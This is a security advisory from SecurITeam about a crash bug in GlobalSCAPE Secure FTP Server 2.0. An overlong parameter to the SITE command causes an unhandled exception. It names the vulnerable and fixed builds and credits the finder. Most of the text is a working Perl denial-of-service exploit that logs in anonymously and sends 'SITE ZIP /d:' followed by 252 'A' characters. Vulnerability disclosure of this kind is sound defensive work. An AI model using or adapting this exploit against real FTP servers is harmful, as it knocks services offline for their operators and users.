|
Brought to you by:
Suppliers of:
|
|
|
| |
| A vulnerability in GlobalSCAPE Secure FTP Server allows a user issuing a long parameter (around 252 bytes) as a value for a SITE command, to cause the server to try and write to a value that is outside the memory location of the Secure FTP Server's memory. This in will cause an exception to be triggered (an un-handled exception), which causes the program to crash. |
| |
Credit:
SecurITeam would like to thank STORM for finding this vulnerability.
|
| |
Vulnerable Systems:
* GlobalSCAPE Secure FTP Server version 2.0 Build 03.11.2004.2
Immune Systems:
* GlobalSCAPE Secure FTP Server version 2.0 Build 03.16.2004.1
Exploit:
To demonstrate this issue we will use the SITE ZIP command, even though SITE ZIP isn't a supported command, and will use SITE ZIP's parameter "/d:" provided after that command gets parsed, which causes the vulnerability.
#!/usr/bin/perl
use IO::Socket;
$host = "192.168.1.243";
$remote = IO::Socket::INET->new ( Proto => "tcp", PeerAddr => $host, PeerPort => "2117");
unless ($remote) { die "cannot connect to ftp daemon on $host" }
print "connected\n";
while (<$remote>)
{
print $_;
if (/220 /)
{
last;
}
}
$remote->autoflush(1);
my $ftp = "USER anonymous\r\n";
print $remote $ftp;
print $ftp;
sleep(1);
while (<$remote>)
{
print $_;
if (/331 /)
{
last;
}
}
$ftp = join("", "PASS ", "a\@b.com", "\r\n");
print $remote $ftp;
print $ftp;
sleep(1);
while (<$remote>)
{
print $_;
if (/230 /)
{
last;
}
}
$ftp = join ("", "SITE ZIP /d:", "A"x(252), "\r\n");
print $remote $ftp;
print $ftp;
sleep(1);
while (<$remote>)
{
print $_;
if (/250 Done/)
{
last;
}
}
close $remote;
|
|
|
|
|
